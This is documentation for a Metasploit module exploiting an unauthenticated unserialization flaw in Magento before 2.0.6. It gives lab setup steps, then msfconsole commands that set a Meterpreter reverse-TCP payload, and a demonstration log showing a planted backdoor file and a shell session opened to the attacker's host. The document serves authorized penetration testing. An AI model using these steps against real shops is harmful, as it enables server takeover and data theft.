adam/metasploit-gs
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
f5bfc8445366e993e3eabca91ea9235ffec5aedc
metasploit-gs/documentation/modules/exploit/multi/http/magento_unserialize.md
T

4.0 KiB
Raw Blame History

Magento is a popular open-source e-commerce platform written in PHP. An unserialization vulnerability exists in the product that allows an unauthenticated user to gain arbitrary code execution.

Vulnerable Application

Magento Community and Enterprise editions before 2.0.6 are affected. The magento_unserialize module was specifically tested against version 2.0.6, on Ubuntu 14.04 and Debian.

For testing purposes, you can download the vulnerable applications here.

Verification Steps

To set up a vulnerable version of Magento, please follow these steps. This is specific to Ubuntu 14, and assumes you are installing Magento under /var/www/html/.

  1. Set up a Ubuntu box.
  2. Open a terminal, and enter: sudo apt-get install apache2
  3. Enter: sudo apt-get install php5
  4. Enter: sudo a2enmod rewrite
  5. Add the following content to /etc/apache2/sites-enabled/000-default.conf, inside the virtual block:
<Directory /var/www/html>
  Options Indexes FollowSymLinks MultiViews
  AllowOverride All
  Order allow,deny
  allow from all
</Directory>
  1. Download the vulnerable Magento app
  2. Extract the compressed file: tar -xf magento2-2.0.5.tar.gz
  3. Move the files and directories of magento2-2.0.5 to /var/www/html/ (make sure .htaccess is copied too)
  4. In terminal, enter: sudo chmod 644 /var/www/html/.htaccess
  5. Enter: sudo service apache2 restart
  6. Enter: sudo apt-get install mysql-server-5.6. And follow the installation instructions of MySQL.
  7. Enter: sudo apt-get install php5-mysql
  8. Enter: sudo apt-get install php5-mcrypt
  9. Enter: sudo php5enmod mcrypt
  10. Enter: sudo apt-get install php5-xsl php5-curl php5-intl
  11. Enter: sudo service apache2 restart
  12. cd to /var/www/html, enter: sudo mkdir tmp, and cd to tmp
  13. In tmp, do: curl -sS https://getcomposer.org/install | php
  14. Enter: sudo mv composer /usr/local/bin/composer
  15. In /var/www/html, do: composer install
  16. You will be asked for a username (public key) and password (private key). You can register for one here: https://marketplace.magento.com/
  17. Back to terminal, enter: mysql -h localhost -u root -p[password]
  18. In mysql, enter: create database magento, and exit
  19. Go to http://localhost with a browser, and install Magento through the web interface.
  20. After installation, back to the terminal, and enter: sudo rm -rf var/cache/*
  21. Enter: sudo rm -rf var/generation/*
  22. Enter: sudo rm -rf var/page_cache/*
  23. cd to /var/www/html/bin
  24. Enter: sudo php magento deploy:mode:set developer. It should say that you're in developer mode.
  25. Enter: sudo php magento setup:static-content:deploy
  26. Enter: sudo php magento indexer:reindex
  27. Enter: sudo chmod -R 777 /var/www/html
  28. Go to http://localhost, you should see Magento up and running.
  29. From Magento, log in as admin, and create a product. After creating one, make sure this product is also searchable from the front-end.

After setting up Magento, you can use your exploit module:

  1. Start msfconsole
  2. Do: exploit/multi/http/magento_unserialize
  3. Do: set RHOST [IP]
  4. Do: set PAYLOAD php/meterpreter/reverse_tcp
  5. Do: set LHOST [IP]
  6. Do: exploit
  7. And you should get a session

Demonstration

msf exploit(magento_unserialize) > check
[*] 192.168.1.108:80 The target appears to be vulnerable.
msf exploit(magento_unserialize) > exploit

[*] Started reverse TCP handler on 192.168.1.94:4444 
[+] 192.168.1.108:80 - generated a guest cart id
[+] 192.168.1.108:80 - backdoor done!
[*] Sending stage (33721 bytes) to 192.168.1.108
[*] Meterpreter session 6 opened (192.168.1.94:4444 -> 192.168.1.108:46835) at 2016-06-02 17:09:34 -0500
[+] 192.168.1.108:80 - Deleted lP5UgbUBLm1sWN25gWfZBqYKms.php

meterpreter >
Reference in New Issue View Git Blame Copy Permalink